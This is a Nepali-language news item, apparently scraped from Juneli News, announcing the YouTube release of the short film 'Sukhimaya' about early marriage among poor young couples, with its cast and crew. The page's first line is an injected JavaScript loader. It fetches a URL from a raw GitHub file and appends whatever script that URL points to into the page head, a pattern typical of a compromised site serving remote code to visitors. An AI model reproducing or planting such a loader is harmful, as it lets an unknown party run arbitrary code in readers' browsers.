;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्यूज, काठमाण्डौ | हाम्रो समाजमा घटिरहने घटनामा आधारित अपरिपक्व तथा कम उमेरमा विहे गरेका गरीब परिवारका युवाहरुको दाम्पत्य जीवनको कथालाई समेटेर बनाइएको छोटो चलचित्र ‘सुखीमाया’ युट्युवमा सार्वजनिक गरिएको छ | उठान गरिएको ‘सुखीमाया’ लाई धारावाहिक रुपमा अघि बढाइने निर्माण पक्षले जानकारी दिएको छ |
सज्जन कुमार ,दिपा थापा मगर ,रासिक सेन्चुरीको मुख्य अभिनय देख्न सकिने चलचित्रमा ,अनिल सुनाम ,कुमार सेन्चुरी लगायतको अभिनय रहेको यो भिडियोको छायांकन,सम्पादन इश्वरबाबुले गरेका हुन् भने कथा र निर्देशन सज्जन कुमार सिंह तर सह निर्देशन अनिल सुनामको रहेको छ । भिडियो मुनाल अफिसियल युटुव च्यानलबाट सार्वजनिक भैसकेको निर्माण पक्षले बताएको छ |
फेसबुक प्रतिक्रियाहरु